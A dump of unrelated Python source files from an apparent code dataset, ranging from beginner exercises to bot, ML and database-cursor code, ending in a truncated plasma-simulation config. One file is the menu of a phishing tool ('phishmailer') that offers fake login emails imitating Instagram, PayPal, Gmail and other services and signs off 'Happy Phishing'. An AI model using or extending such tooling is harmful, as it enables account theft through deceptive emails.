text stringlengths 8 6.05M |
|---|
# Import requried modules
import fresh_tomatoes
import media
# Initialize instances of specific movies
fitzcarraldo = media.Movie("Fitzcarraldo",
"http://www.impawards.com/1982/posters/fitzcarraldo.jpg", # NOQA
"https://www.youtube.com/watch?v=gqugru2d1h8")
nosferatu = media.Movie("Nosferatu the Vampyre",
"https://polishpostershop.com/media/catalog/product/cache/1/image/9df78eab33525d08d6e5fb8d27136e95/k/a/kaja-poster04482.jpg", # NOQA
"https://www.youtube.com/watch?v=S1Rachk7ipI")
aguirre = media.Movie("Aguirre, the Wrath of \nGod",
"http://www.impawards.com/1972/posters/aguirre_wrath_of_god_ver2.jpg", # NOQA
"https://www.youtube.com/watch?v=eJDuicFyJPg")
bad_lieutenant = media.Movie("Bad Lieutenant",
"http://www.impawards.com/2009/posters/bad_lieutenant_port_of_call_new_orleans_xlg.jpg", # NOQA
"https://www.youtube.com/watch?v=rvy1qlbh5Q4")
my_son = media.Movie("My Son, My Son",
"http://www.impawards.com/2009/posters/my_son_my_son_what_have_ye_done.jpg", # NOQA
"https://www.youtube.com/watch?v=nqVbo0GX07M")
queen_of_desert = media.Movie("Queen of the Desert",
"http://www.impawards.com/2015/posters/queen_of_the_desert.jpg", # NOQA
"https://www.youtube.com/watch?v=5g2bBX_stcg")
# Create a list of movie instances
movies = [fitzcarraldo, nosferatu, aguirre, bad_lieutenant, my_son,
queen_of_desert]
def main():
"""Create an html file with movies and serve it via the 'file' protocol"""
fresh_tomatoes.open_movies_page(movies)
if __name__ == '__main__':
main()
|
name = "dayyan"
print(len(name)) #Finds the Length of the variable
print(name.find("n")) #Finds which character th first is located on
print(name.capitalize()) #Capitalizes the first letter
print(name.upper()) #Makes it all uppercase
print(name.lower()) #Makes it all lowercase
print(name.isdigit()) #Answers if its a numerical value or not
print(name.isalpha()) #Answers if its only letters (no Spaces etc)
print(name.count("y")) #Counts how many characters in a string
print(name.replace("a","n")) #Replaces all characters specified with the second character
print(int(name*3)) #Will repeat by the numerical value
#https://www.youtube.com/watch?v=2WZvl1R4A6g&list=PLZPZq0r_RZOOkUQbat8LyQii36cJf2SWT&index= |
# Selection sort implementation
numbers = [3,53,65,1,321,54,76,43,2,4,66]
# Time: O(n^2) || Space: O(1)
def selectionSort(array):
length = len(array)
for x in range(length):
minimum = x
temp = array[x]
for j in range(x+1, length):
if array[j] < array[minimum]:
minimum = j
array[x] = array[minimum]
array[minimum] = temp
selectionSort(numbers)
print(numbers) |
import csv
from pathlib import Path
path = Path(r'C:/Data/Python/NLP/FatAcceptance/Training/Final/ULMFiT')
with open(path / 'pred.csv', encoding='utf') as f:
reader = csv.reader(f)
line = 0
num = 0
for row in reader:
line += 1
if line == 1:
continue
if row[0] == '0' and row[2] == '1':
num += 1
print('%s: %s' % (num, row[1])) |
# -*- coding: utf-8 -*-
class Solution:
def minTimeToType(self, word: str) -> int:
current_char, result = "a", 0
for char in word:
current_char, result = (
char,
result + self.timeToMove(current_char, char) + 1,
)
return result
def timeToMove(self, char1, char2) -> int:
diff = abs(ord(char1) - ord(char2))
return min(diff, 26 - diff)
if __name__ == "__main__":
solution = Solution()
assert 5 == solution.minTimeToType("abc")
assert 7 == solution.minTimeToType("bza")
assert 34 == solution.minTimeToType("zjpc")
|
from ICICI import ICICI #from icici.py module we import icici class and its contents
ravi = ICICI()#object created with ref variable ravi
ravi.deposit(1000)#calling method with refvar ravi
ravi.showBalance()#showing the bal
|
#python imports
import sys
import os
import time
import datetime
import subprocess
import json
import requests
from termcolor import colored
#third-party imports
#No third-party imports
#programmer generated imports
from logger import logger
from fileio import fileio
'''
***BEGIN DESCRIPTION***
Type: Triage - Description: Retrieves any available data for a target against the Abuse.ch Malware Bazaar database.
***END DESCRIPTION***
'''
def POE(POE):
if (POE.logging == True):
LOG = logger()
newlogentry = ''
reputation_dump = ''
reputation_output_data = ''
malwarebazaar = ''
if (POE.logging == True):
newlogentry = 'Module: malware_bazaar'
LOG.WriteStrongLog(POE.logdir, POE.targetfilename, newlogentry)
global json
query_status = ''
first_seen = ''
last_seen = ''
signature = ''
sig_count = 0
output = POE.logdir + 'MalwareBazaar.json'
FI = fileio()
print (colored('\r\n[*] Running abuse.ch Malware Bazaar against: ' + POE.target, 'white', attrs=['bold']))
malwarebazaar = "https://mb-api.abuse.ch/api/v1/" #API URL
data = { #Our header params
'query': 'get_info',
'hash': POE.SHA256,
}
response_dump = requests.post(malwarebazaar, data=data, timeout=15) # Give us the results as JSON
if (POE.debug == True):
print (response_dump)
try:
FI.WriteLogFile(output, response_dump.content.decode("utf-8", "ignore"))
print (colored('[*] Malware Bazaar data had been written to file here: ', 'green') + colored(output, 'blue', attrs=['bold']))
if ((POE.logging == True) and (POE.nolinksummary == False)):
newlogentry = 'Malware Bazaar data has been generated to file here: <a href=\"' + output + '\"> Malware Bazaar Host Output </a>'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
except:
print (colored('[x] Unable to write Malware Bazaar data to file', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'Unable to write Malware Bazaar data to file'
LOG.WriteStrongSubLog(POE.logdir, POE.targetfilename, newlogentry)
POE.csv_line += 'N/A,'
return -1
try:
#Open the file we just downloaded
print ('[-] Reading Malware Bazaar file: ' + output.strip())
with open(output.strip(), 'rb') as read_file:
data = json.load(read_file, cls=None)
read_file.close()
# Check what kind of results we have
query_status = data["query_status"]
print ('[*] query_status: ' + query_status)
if (query_status == 'ok'):
with open(output.strip(), 'r') as read_file:
for string in read_file:
if (POE.debug == True):
print ('[DEBUG] string: ' + string.strip())
if ('first_seen' in string):
first_seen = string.strip()
if ('last_seen' in string):
last_seen = string.strip()
if (('signature' in string) and (sig_count == 0)):
signature = string.strip()
sig_count += 1
print ('[*] Sample ' + first_seen.replace(',',''))
print ('[*] Sample ' + last_seen.replace(',',''))
print ('[*] Sample ' + signature.replace(',',''))
if (POE.logging == True):
newlogentry = 'Sample ' + first_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + last_seen.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
newlogentry = 'Sample ' + signature.replace(',','')
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'hash_not_found'):
print (colored('[-] The hash value has not been found...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Can't find anything on this one...
elif (query_status == 'no_results'):
print (colored('[-] No results available for host...', 'yellow', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'No results available for host...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
#Something weird happened...
else:
print (colored('[x] An error has occurred...', 'red', attrs=['bold']))
if (POE.logging == True):
newlogentry = 'An error has occurred...'
LOG.WriteSubLog(POE.logdir, POE.targetfilename, newlogentry)
except Exception as e:
print (colored('[x] Error: ' + str(e) + ' Terminating...', 'red', attrs=['bold']))
read_file.close()
return -1
#Clean up before returning
read_file.close()
return 0
|
from collections import OrderedDict
from typing import Dict, Optional
from torch import nn, Tensor
from torch.nn import functional as F
from ...utils import _log_api_usage_once
class _SimpleSegmentationModel(nn.Module):
__constants__ = ["aux_classifier"]
def __init__(self, backbone: nn.Module, classifier: nn.Module, aux_classifier: Optional[nn.Module] = None) -> None:
super().__init__()
_log_api_usage_once(self)
self.backbone = backbone
self.classifier = classifier
self.aux_classifier = aux_classifier
def forward(self, x: Tensor) -> Dict[str, Tensor]:
input_shape = x.shape[-2:]
# contract: features is a dict of tensors
features = self.backbone(x)
result = OrderedDict()
x = features["out"]
x = self.classifier(x)
x = F.interpolate(x, size=input_shape, mode="bilinear", align_corners=False)
result["out"] = x
if self.aux_classifier is not None:
x = features["aux"]
x = self.aux_classifier(x)
x = F.interpolate(x, size=input_shape, mode="bilinear", align_corners=False)
result["aux"] = x
return result
|
#number 1
# Create a variable savings
savings = 100
# Print out savings
print(savings)
#number 2
# Create a variable savings
savings = 100
# Create a variable factor
factor = 1.10
# Calculate result
result = savings * (factor**7)
# Print out result
print(result)
#number 3
# Create a variable desc
desc = "compound interest"
# Create a variable profitable
profitable = True
#number 4
#a = float b = str c = bool
#number 5
# Several variables to experiment with
savings = 100
factor = 1.1
desc = "compound interest"
# Assign product of factor and savings to year1
year1 = savings * factor
# Print the type of year1
print(type(year1))
# Assign sum of desc and desc to doubledesc
doubledesc = desc + desc
# Print out doubledesc
print(doubledesc)
#number 6
# Definition of savings and result
savings = 100
result = 100 * 1.10 ** 7
# Fix the printout
print("I started with $" + str(savings) + " and now have $" + str(result) + ". Awesome!")
# Definition of pi_string
pi_string = "3.1415926"
# Convert pi_string into float: pi_float
pi_float = float(pi_string)
#number 7
#"The correct answer to this multiple choice exercise is answer number " + 2
|
#!/usr/bin/env python
import math
import rospy
from nav_msgs.msg import Odometry
benda=[]
benda.append(('Cube', 0.31,-0.99));
benda.append(('Dumpster', 0.11,-2.42));
benda.append(('Cylinder', -1.14,-2.88));
benda.append(('Barrier', -2.59,-0.83));
benda.append(('Bookshelf', -0.09,0.53));
def jarak(x1,y1,x2,y2):
xd=x1-x2
yd=y1-y2
return math.sqrt(abs(xd*xd - yd*yd))
def callback(msg):
x=msg.pose.pose.position.x
y=msg.pose.pose.position.y
closest_name=None
closest_dist=None
for lname,lx,ly in benda:
dist= jarak(x, y, lx, ly)
if closest_dist is None or dist < closest_dist:
closest_name=lname
closest_dist=dist
rospy.loginfo('closest: {}'.format(closest_name))
def main():
rospy.init_node('location_monitor')
rospy.Subscriber('/odom', Odometry, callback)
rospy.spin()
if __name__=='__main__':
main()
|
#coding:gb2312
#while循环简介
print("Whlie 循环从1数到5:")
num = 1
while num <=5:
print(num)
num += 1
#让用户选择何时退出
prompt = "\nTell me something,and i will repeat it back to you:"
prompt += "\nEnter 'quit' to end the program."
message = ''
while message !='quit':
message=input(prompt)
if message !='quit':
print(message)
|
from app import app as application
if __name__ == '__main__':
app.run()
'''
from wsgiref.simple_server import make_server
httpd = make_server('localhost', 8051, application)
print("Serving at http://localhost:8051/ \n PRESS CTRL+C to Terminate. \n")
httpd.serve_forever()
print("Terminated!!")
''' |
class solution:
def maxProfile(self, prices):
buy1 = [0]*len(prices)
buy1[0] = -1*prices[0]
sell1 = [0]*len(prices)
buy2 = [0]*len(prices)
buy2[0] = -1*prices[0]
sell2 = [0]*len(prices)
for i in range(len(prices)):
if i>0:
buy1[i] = max(buy1[i-1],0-prices[i])
sell1[i] = max(sell1[i-1],buy1[i-1]+prices[i])
buy2[i] = max(buy2[i-1],sell1[i-1]-prices[i])
sell2[i] = max(sell2[i-1],buy2[i-1]+prices[i])
return sell2[len(prices)-1]
if __name__ == '__main__':
sol = solution()
prices = [1]
print(sol.maxProfile(prices))
|
phonebook = {'Anirach': '777-1111','Mickey': '777-2222', 'Donald': '777-3333'}
phonebook['Bart'] = [1, 3, 5]
elements = len(phonebook)
print('There are ', elements, ' names in phonebook')
for key in phonebook:
print(key, ' phone number is: ', phonebook[key])
phonebook['Bart'][1] = 9
print(phonebook)
print(list(phonebook))
for i in list(phonebook)[::-1]:
print(i,'phone number is :',phonebook[i])
|
from discord import Member, Embed, Color
from discord.ext import tasks, commands
from tinydb import Query
from time import time
from Utilities.Database import commissionsTable
from Utilities.CommissionsHelper import (
add_commission,
remove_commission,
update_all_commissions,
)
from Utilities.HasPermissions import has_permissions
class CommissionsCog(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.update_commissions.start()
def cog_unload(self):
self.update_commissions.cancel()
@commands.command(help="Gives a commission")
@has_permissions()
async def give(self, ctx, user: Member, days: int, *, name):
if user.bot:
return await ctx.send("Bots can not have commissions")
response = add_commission(user.guild.id, user.id, name, days)
await ctx.send(response.get("message"))
@commands.command(help="Cancels a commission")
@has_permissions()
async def cancel(self, ctx, user: Member, *, name=None):
if user.bot:
return await ctx.send("Bots can not have commissions")
response = remove_commission(user.guild.id, user.id, name)
count = response.get("payload")
message = (
"Successfully cancelled {} commission(s)".format(count)
if name == None
else "Successfully cancelled '{}' commission".format(name)
)
await ctx.send(message)
@commands.command(help="Completes a commission")
@has_permissions()
async def complete(self, ctx, user: Member, *, name=None):
if user.bot:
return await ctx.send("Bots can not have commissions")
response = remove_commission(user.guild.id, user.id, name)
count = response.get("payload")
message = (
"Successfully completed {} commission(s)".format(count)
if name == None
else "Successfully completed '{}' commission".format(name)
)
await ctx.send(message)
@commands.command(help="Views commissions")
async def view(self, ctx, user: Member):
if user.bot:
return await ctx.send("Bots can not have commissions")
commissions_query = commissionsTable.search(
(Query().guildId == user.guild.id) & (Query().userId == user.id)
)
total_commissions = len(commissions_query)
embed = Embed(
title="Commissions",
description="{.display_name} has {} total active commission(s).".format(
user, total_commissions
)
if total_commissions > 0
else "{.display_name} has no active commissions.".format(user),
colour=Color.purple(),
)
embed.set_author(name=user.display_name, icon_url=user.avatar_url)
for user_record in commissions_query:
timestamp = user_record.get("timestamp")
days = user_record.get("days")
current_time = time()
expire_time = timestamp + (days * 86400)
days_left = round((expire_time - current_time) / 86400)
embed.add_field(
name=user_record.get("commission"),
value="{} day(s) left".format(days_left),
inline=True,
)
await ctx.send(embed=embed)
@tasks.loop(minutes=5)
async def update_commissions(self):
await update_all_commissions(self.bot)
@update_commissions.before_loop
async def before_update_commissions(self):
await self.bot.wait_until_ready()
|
import matplotlib.pyplot as plt
import matplotlib.ticker as mticker
def plotByMonth(df, name, title):
ticklabels = [item.strftime('%b %Y') for item in df.index]
ax = df.plot(kind='bar', figsize=(15, 5), alpha=0.6)
ax.xaxis.set_major_formatter(mticker.FixedFormatter(ticklabels))
plt.title(title)
plt.ylabel('#Analyses')
# plt.savefig('img/{0}.png'.format(name), bbox_inches='tight')
plt.show()
def plotByMonthPercentage(df, name, title):
ticklabels = [item.strftime('%b %Y') for item in df.index]
ax = df.plot(kind='bar', stacked=True, figsize=(15, 5), alpha=0.6)
ax.xaxis.set_major_formatter(mticker.FixedFormatter(ticklabels))
ax.set_ylim([0, 1])
plt.title(title)
plt.ylabel('Percent (x100)')
# plt.savefig('img/{0}.png'.format(name), bbox_inches='tight')
plt.show() |
from itertools import product, chain
from .. import grid
from . import tile
bg_colors = ['red', 'magenta', 'green', 'cyan', 'blue', 'cyan', 'yellow']
fg_colors = ['black', 'black', 'black', 'black', 'white', 'black', 'black']
class Grid(grid.Grid):
vert_div = '||'
hor_div = '='
cross_div = 'XX'
def __init__(self, x=0, y=0, rows=0, cols=0, tile_width=0, tile_height=0,
term=None, Tile=tile.Tile):
super(Grid, self).__init__(rows=rows, cols=cols, Tile=Tile)
self.x, self.y = x, y
self.tile_width, self.tile_height = tile_width, tile_height
self.term = term
def draw(self, fg='white', bg=None):
style = getattr(self.term, fg + ("_on_" + bg if bg else ""))
rows, cols = len(self), len(self[0])
for col_idx in range(cols - 1):
hor_offset = ((col_idx + 1) * self.tile_width +
col_idx * len(self.vert_div))
for vert_offset in range(self.height):
with self.term.location(self.x + hor_offset,
self.y + vert_offset):
print(style(self.vert_div))
for row_idx in range(rows - 1):
vert_offset = (row_idx + 1) * self.tile_height + row_idx
with self.term.location(self.x, self.y + vert_offset):
print(style(self.cross_div.join(
[self.hor_div * self.tile_width] * cols)))
def update_tiles(self):
for row_idx, col_idx in product(range(len(self)), range(len(self[0]))):
if self[row_idx][col_idx]:
tile = self[row_idx][col_idx]
tile.x, tile.y = self.tile_coord(row_idx, col_idx)
tile.height, tile.width = self.tile_height, self.tile_width
self[row_idx][col_idx] = tile
def draw_tiles(self):
for tile in filter(None, chain(*self)): # all non-empty tiles
# choose a color, use modulo to support any value of a tile
# all bg colors have a bright variant doubling the amount of colors
color_idx = (tile.exponent - 1) % (len(bg_colors) * 2) // 2
bg = bg_colors[color_idx]
if self.term.number_of_colors >= 16 and tile.exponent % 2 == 0:
bg = "bright_" + bg
tile.draw(fg=fg_colors[color_idx], bg=bg)
def draw_empty_tile(self, row, column):
x, y = self.tile_coord(row, column)
for y_offset in range(self.tile_height):
with self.term.location(x, y + y_offset):
print(' ' * self.tile_width)
@property
def width(self):
cols = len(self[0])
if cols > 0:
return cols * self.tile_width + (cols - 1) * len(self.vert_div)
return 0
@property
def height(self):
rows = len(self)
if rows > 0:
return rows * self.tile_height + rows - 1
return 0
def tile_coord(self, row, column):
if row >= len(self) or column >= len(self[0]):
raise IndexError
x = self.x + column * self.tile_width + column * len(self.vert_div)
y = self.y + row * self.tile_height + row
return x, y
def spawn_tile(self, *args, **kwargs):
action = super(Grid, self).spawn_tile(*args, **kwargs)
row, column = action.new
if kwargs.get('apply', True):
x, y = self.tile_coord(row, column)
self[row][column].x, self[row][column].y = x, y
self[row][column].height = self.tile_height
self[row][column].width = self.tile_width
return action
def move(self, *args, **kwargs):
actions = super(Grid, self).move(*args, **kwargs)
if kwargs.get('apply', True):
for action in actions:
row, col = action.new
self[row][col].x, self[row][col].y = self.tile_coord(row, col)
return actions
|
#Normal Import
import time
import os
import sys
#emails:
from Core.eletter import Instagram
from Core.eletter import Facebook
from Core.eletter import Gmail
from Core.eletter import Twitter
from Core.eletter import AskFM
from Core.eletter import Webhost000
from Core.eletter import Blockchain
from Core.eletter import Spotify
from Core.eletter import Rockstar
from Core.eletter import Dreamteam
from Core.eletter import RiotGames
from Core.eletter import Steam
from Core.eletter import Gamehag
from Core.eletter import GmailActivity
from Core.eletter import SnapchatSimple
from Core.devicemenu import Linkedin
from Core.devicemenu import Dropbox
from Core.ipmenu import Discord
from Core.ipmenu import Paypal1
from Core.ipmenu import Snapchat
#EmailSender:
from Core.mailer import NormalEmail
red = ("\033[1;31;40m")
green = ("\033[1;32;40m")
white = ("\033[1;37;40m")
blue = ("\033[1;34;40m")
os.system("clear")
time.sleep(0.5)
print(white + "options:")
print(green + "[" + white + "1" + green + "]" + white + " Instagram" + green + " [" + white + "11" + green + "]" + white + " Paypal")
print(green + "[" + white + "2" + green + "]" + white + " Facebook" + green + " [" + white + "12" + green + "]" + white + " Discord")
print(green + "[" + white + "3" + green + "]" + white + " Gmail" + green + " [" + white + "13" + green + "]" + white + " Spotify")
print(green + "[" + white + "4" + green + "]" + white + " Gmail (simple)" + green + " [" + white + "14" + green + "]" + white + " Blockchain")
print(green + "[" + white + "5" + green + "]" + white + " Twitter" + green + " [" + white + "15" + green + "]" + white + " RiotGames")
print(green + "[" + white + "6" + green + "]" + white + " Snapchat" + green + " [" + white + "16" + green + "]" + white + " Rockstar")
print(green + "[" + white + "7" + green + "]" + white + " Snapchat (simple)" + green + " [" + white + "17" + green + "]" + white + " AskFM")
print(green + "[" + white + "8" + green + "]" + white + " Steam" + green + " [" + white + "18" + green + "]" + white + " 000Webhost")
print(green + "[" + white + "9" + green + "]" + white + " Dropbox" + green + " [" + white + "19" + green + "]" + white + " Dreamteam")
print(green + "[" + white + "10" + green + "]" + white + " Linkedin" + green + " [" + white + "20" + green + "]" + white + " Gamehag")
print(green + "-----------------------------------------------------------------------")
print(green + "[" + white + "30" + green + "]" + white + " Send Phishing Email")
print(green + "[" + white + "99" + green + "]" + red + " EXIT")
print(green + "[" + white + "1337" + green + "]" + white + " Info\n")
print(green)
mailPick = int(input("root@phishmailer:~ " + white))
if mailPick == 1:
Instagram()
elif mailPick == 2:
Facebook()
elif mailPick == 3:
Gmail()
elif mailPick == 4:
GmailActivity()
elif mailPick == 5:
Twitter()
elif mailPick == 6:
Snapchat()
elif mailPick == 7:
SnapchatSimple()
elif mailPick == 8:
Steam()
elif mailPick == 9:
Dropbox()
elif mailPick == 10:
Linkedin()
elif mailPick == 11:
Paypal1()
elif mailPick == 12:
Discord()
elif mailPick == 13:
Spotify()
elif mailPick == 14:
Blockchain()
elif mailPick == 15:
RiotGames()
elif mailPick == 16:
Rockstar()
elif mailPick == 17:
AskFM()
elif mailPick == 18:
Webhost000()
elif mailPick == 19:
Dreamteam()
elif mailPick == 20:
Gamehag()
elif mailPick == 30:
NormalEmail()
elif mailPick == 99:
os.system("clear")
print("Hope I See You Soon")
print("Happy Phishing")
sys.exit()
elif mailPick == 1337:
print("\n" + green + "[" + white + "+" + green + "]" + white + " I Do Not Take Any Responsibility For Your Actions")
print("\n" + green + "[" + white + "+" + green + "]" + white + " But I Don't Give A F*ck About What You Do")
else:
print("\nSomething Went Wrong There Partner")
print("Are You Ok? Did You Fell Out The Boat And Started Drowning?")
sys.exit()
|
import torch
import torch.nn as nn
from model.audio_encoder import RNN
class res_linear_layer(nn.Module):
def __init__(self, linear_hidden = 1024,time=1024):
super(res_linear_layer,self).__init__()
self.layer = nn.Sequential(
nn.Linear(linear_hidden, linear_hidden),
nn.BatchNorm1d(time),
nn.ReLU(),
nn.Linear(linear_hidden, linear_hidden),
nn.BatchNorm1d(time),
nn.ReLU()
)
def forward(self,input):
output = self.layer(input) #51,1024
return output
class pose_decoder(nn.Module):
def __init__(self,batch,hidden_channel_num=64,input_c = 266,linear_hidden = 1024,encoder='gru'):
super(pose_decoder,self).__init__()
self.batch=batch
self.encoder = encoder
self.tmpsize = 128 if 'min' in encoder else 256
if 'initp' in self.encoder:
self.size = self.tmpsize+10+5
else:
self.size = self.tmpsize+10
#self.relu = nn.ReLU()
#self.decoder = nn.GRU(bidirectional=True,hidden_size=36, input_size=266,num_layers= 3, batch_first=True)
#self.fc=nn.Linear(72,36)
# TODO! change here!!!!!
if 'lstm' in encoder:
self.rnn_noise = nn.LSTM(10, 10, batch_first=True)
else:
self.rnn_noise = nn.GRU( 10, 10, batch_first=True)
self.rnn_noise_squashing = nn.Tanh()
# state size. hidden_channel_num*8 x 360 x 640
if 'initp' in self.encoder:
self.layeri = nn.Linear(36, 250)
self.layer0 = nn.Linear(36, linear_hidden)
self.layer1 = res_linear_layer(linear_hidden = linear_hidden)
self.layer2 = res_linear_layer(linear_hidden = linear_hidden)
self.layer3 = res_linear_layer(linear_hidden = linear_hidden)
self.final_linear = nn.Linear(linear_hidden, self.tmpsize)
def forward(self,input):
#initpose : 18,2
# input: -1, 50, 36
# output: -1, 50, 128(or 256)
input = input.view(-1, 36)
output = self.layer0(input)
output = self.layer1(output) + output
output = self.layer2(output) + output
output = self.layer3(output) + output
output = self.final_linear(output)#,36
output = output.view(self.batch,50,self.tmpsize)
# output = output[:,1:,:]
# print('output',output.size())
#output = self.rnn_noise_squashing(output)
return output |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from xpinyin import Pinyin
from django.shortcuts import render, render_to_response
from django import forms # 重点要导入,使用 Django 的 表单
from django.http import HttpResponse
from .models import Image
class ImageForm(forms.Form):
name = forms.CharField() # 字符串
headImg = forms.FileField() # 文件
'''
函数判断用户的是否为POST请求,如果是并验证是有效的,然后就返回upload ok!,在验证正确和返回OK的中间放我们的上传文件代码,因为只有文件上传成功能返回OK,我们一会说,如果是GET请求,就直接显示一个空表单,让用户输入。
'''
def upload(request):
if request.method == "POST":
uf = ImageForm(request.POST, request.FILES)
if uf.is_valid():
name = uf.cleaned_data["name"]
eng_name = Pinyin().get_pinyin(name, "_").replace(" ", "_")
head_img = uf.cleaned_data["headImg"]
image = Image()
image.name = name
image.eng_name = eng_name
image.headImg = head_img
image.save()
return HttpResponse("Upload OK !")
else:
uf = ImageForm()
return render_to_response('army/upload.html', {"uf": uf})
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for cursors.
These classes centralize common code.
"""
from vtdb import dbexceptions
class BasePEP0249Cursor(object):
"""Cursor with common PEP0249 implementations."""
def __init__(self):
self._clear_common_state()
self._conn = None
def callproc(self):
"""For PEP 0249."""
raise dbexceptions.NotSupportedError
def executemany(self, sql, params_list):
"""For PEP 0249."""
_ = sql, params_list
raise dbexceptions.NotSupportedError
def nextset(self):
"""For PEP 0249."""
raise dbexceptions.NotSupportedError
def setinputsizes(self, sizes):
"""For PEP 0249."""
_ = sizes
def setoutputsize(self, size, column=None):
"""For PEP 0249."""
_ = size, column
@property
def rownumber(self):
return self.index
def __iter__(self):
"""For PEP 0249: To make cursors compatible to the iteration protocol."""
return self
def next(self):
"""For PEP 0249."""
val = self.fetchone()
if val is None:
raise StopIteration
return val
def close(self):
"""For PEP 0249."""
raise NotImplementedError
def fetchone(self):
"""For PEP 0249."""
raise NotImplementedError
def fetchmany(self, size=None):
"""For PEP 0249."""
raise NotImplementedError
def fetchall(self):
"""For PEP 0249."""
raise NotImplementedError
def _clear_common_state(self):
self.index = 0
@property
def connection(self):
if not self._conn:
raise dbexceptions.ProgrammingError(
'Cannot use closed cursor %s.' % self.__class__)
return self._conn
class BaseListCursor(BasePEP0249Cursor):
"""Base cursor where results are stored as a list.
Execute call should return a (results, rowcount, lastrowid,
description) tuple. The fetch commands traverse self.results.
"""
arraysize = 1
def __init__(self, single_db=False, twopc=False):
super(BaseListCursor, self).__init__()
self._clear_list_state()
self.effective_caller_id = None
self.single_db = single_db
self.twopc = twopc
def _clear_list_state(self):
self._clear_common_state()
self.description = None
self.lastrowid = None
self.rowcount = None
self.results = None
def set_effective_caller_id(self, effective_caller_id):
"""Set the effective caller id that will be used in upcoming calls."""
self.effective_caller_id = effective_caller_id
def begin(self):
return self.connection.begin(
effective_caller_id=self.effective_caller_id,
single_db=self.single_db)
def commit(self):
return self.connection.commit(self.twopc)
def rollback(self):
return self.connection.rollback()
def _check_fetch(self):
if self.results is None:
raise dbexceptions.ProgrammingError('Fetch called before execute.')
def _handle_transaction_sql(self, sql):
sql_check = sql.strip().lower()
if sql_check == 'begin':
self.begin()
return True
elif sql_check == 'commit':
self.commit()
return True
elif sql_check == 'rollback':
self.rollback()
return True
else:
return False
def close(self):
self._clear_list_state()
self._conn = None
def fetchone(self):
self._check_fetch()
if self.index >= len(self.results):
return None
self.index += 1
return self.results[self.index - 1]
def fetchmany(self, size=None):
self._check_fetch()
if self.index >= len(self.results):
return []
if size is None:
size = self.arraysize
res = self.results[self.index:self.index + size]
self.index += size
return res
def fetchall(self):
self._check_fetch()
return self.fetchmany(len(self.results) - self.index)
class BaseStreamCursor(BasePEP0249Cursor):
"""Base cursor where results are returned as a generator.
This supports large queries. An execute call returns a (generator,
description) pair. The fetch functions read items from the generator
until it is exhausted.
"""
arraysize = 1
def __init__(self):
super(BaseStreamCursor, self).__init__()
self._clear_stream_state()
self.effective_caller_id = None
def set_effective_caller_id(self, effective_caller_id):
"""Set the effective caller id that will be used in upcoming calls."""
self.effective_caller_id = effective_caller_id
def _clear_stream_state(self):
self._clear_common_state()
self.description = None
self.generator = None
def fetchone(self):
if self.description is None:
raise dbexceptions.ProgrammingError('Fetch called before execute.')
self.index += 1
try:
return self.generator.next()
except StopIteration:
return None
# fetchmany can be called until it returns no rows. Returning less rows
# than what we asked for is also an indication we ran out, but the cursor
# API in PEP249 is silent about that.
def fetchmany(self, size=None):
if size is None:
size = self.arraysize
result = []
for _ in xrange(size):
row = self.fetchone()
if row is None:
break
result.append(row)
return result
def fetchall(self):
result = []
while True:
row = self.fetchone()
if row is None:
break
result.append(row)
return result
def close(self):
if self.generator:
self.generator.close()
self._clear_stream_state()
self._conn = None
|
from pypm.icp import ICP
from pypm.data_points import DataPoints |
# class Test():
# def __init__(self):
# self.name = 'aaa'
#
#
# def function(self):
# pass
#
# # test1= Test()
# print(Test().name)
import time
try:
add = 5
assert(add == 5, '错误')
# raise NameError('错误')
except Exception as e:
print(e)
else:
print('pass')
print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())) |
#!/usr/bin/env python3
#
# This example illustrates the use of the 'TRANSFORMER' boundary
# condition for the poloidal flux equation, whereby a resistive wall
# is assumed, along with a non-zero applied loop voltage via the
# transformer (passing through major radius R = 0).
#
# Run as
#
# $ ./generate.py
# $ ../../build/iface/dreami dream_settings.h5
#
# ###################################################################
import numpy as np
import sys
sys.path.append('../../py/')
from DREAM.DREAMSettings import DREAMSettings
import DREAM.Settings.Equations.ElectricField as ElectricField
import DREAM.Settings.Equations.IonSpecies as Ions
import DREAM.Settings.Equations.RunawayElectrons as Runaways
import DREAM.Settings.Solver as Solver
import DREAM.Settings.CollisionHandler as Collisions
ds = DREAMSettings()
# Physical parameters
n = 5e19 # Electron density (m^-3)
T = 100 # Temperature (eV)
# Grid parameters
tMax = 5e-1 # simulation time in seconds
Nt = 40 # number of time steps
Nr = 30
# Tokamak parameters
a = 0.9 # (m)
b = 1.2 # (m)
B0 = 3.1 # (T)
R0 = 2.96 # (m)
tau_wall = 0.01 # (s)
# Set E_field
#ds.eqsys.E_field.setInitialProfile(0)
ds.eqsys.E_field.setType(ElectricField.TYPE_SELFCONSISTENT)
ds.eqsys.E_field.setBoundaryCondition(ElectricField.BC_TYPE_TRANSFORMER, V_loop_wall_R0=0.4/R0, inverse_wall_time=1/tau_wall, R0=R0)
# Set temperature
ds.eqsys.T_cold.setPrescribedData(T)
# Set ions
ds.eqsys.n_i.addIon(name='D', Z=1, iontype=Ions.IONS_PRESCRIBED_FULLY_IONIZED, n=n)
# Disable kinetic grids
ds.hottailgrid.setEnabled(False)
ds.runawaygrid.setEnabled(False)
# Set up radial grid
ds.radialgrid.setB0(B0)
ds.radialgrid.setMinorRadius(a)
ds.radialgrid.setWallRadius(b)
ds.radialgrid.setNr(Nr)
# Set solver type
ds.solver.setType(Solver.NONLINEAR)
# Include otherquantities to save to output
